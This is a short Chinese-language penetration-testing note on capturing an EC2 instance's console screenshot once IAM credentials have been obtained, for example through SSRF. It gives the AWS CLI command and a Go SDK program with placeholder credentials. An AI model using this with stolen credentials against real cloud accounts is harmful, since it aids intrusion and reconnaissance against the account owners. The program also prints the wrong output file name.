在滲透測試中,桌面截圖是一種獲得額外信息或增加攻擊者瞭解目標環境的重要手段
前提:要取得iam credential憑證(可以用SSRF等手段取得)
get-console-screenshot
> aws ec2 get-console-screenshot --instance-id {EC2_INSTANCE_ID} --output text
Output:
image bytes
前提:要取得iam credential憑證(可以用SSRF等手段取得)
package main
import (
"bytes"
"encoding/base64"
"fmt"
"image/jpeg"
"os"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/credentials"
"github.com/aws/aws-sdk-go/aws/session"
"github.com/aws/aws-sdk-go/service/ec2"
)
func main() {
// AWS Session
sess, err := session.NewSession(&aws.Config{
Region: aws.String("XXXXXXXX"),
Credentials: credentials.NewStaticCredentials("XXX", "XXXXXXXXXX", ""),
})
if err != nil {
fmt.Println("Error creating session:", err)
return
}
// EC2 Service Client
svc := ec2.New(sess)
// EC2 instance ID
instanceID := "X-XXXXXXXXXXXXX"
// Get console screenshot
input := &ec2.GetConsoleScreenshotInput{
InstanceId: aws.String(instanceID),
}
// Get screenshot result
result, err := svc.GetConsoleScreenshot(input)
if err != nil {
fmt.Println("Error getting console screenshot:", err)
return
}
// Decode screenshot
imageData := *result.ImageData
imgBytes, err := base64.StdEncoding.DecodeString(imageData)
if err != nil {
fmt.Println("Error decoding image data:", err)
return
}
// Build image buffer
imgBuf := bytes.NewReader(imgBytes)
// Decode image
img, err := jpeg.Decode(imgBuf)
if err != nil {
fmt.Println("Error decoding image:", err)
return
}
// Build image file
imgFile, err := os.Create("screenshot.jpg")
if err != nil {
fmt.Println("Error creating image file:", err)
return
}
defer imgFile.Close()
// Encode image to file
jpeg.Encode(imgFile, img, nil)
fmt.Println("Screenshot saved as screenshot.png")
}